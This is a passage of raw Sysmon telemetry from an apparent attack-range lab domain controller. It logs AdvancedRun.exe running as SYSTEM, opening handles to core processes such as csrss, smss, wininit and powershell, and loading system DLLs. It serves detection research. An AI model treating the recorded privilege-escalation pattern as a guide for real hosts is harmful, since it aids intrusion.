20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004078583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004078581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.881{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004078579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.870{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.864{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.857{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004078574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004078564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 
20:16:35.056{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedr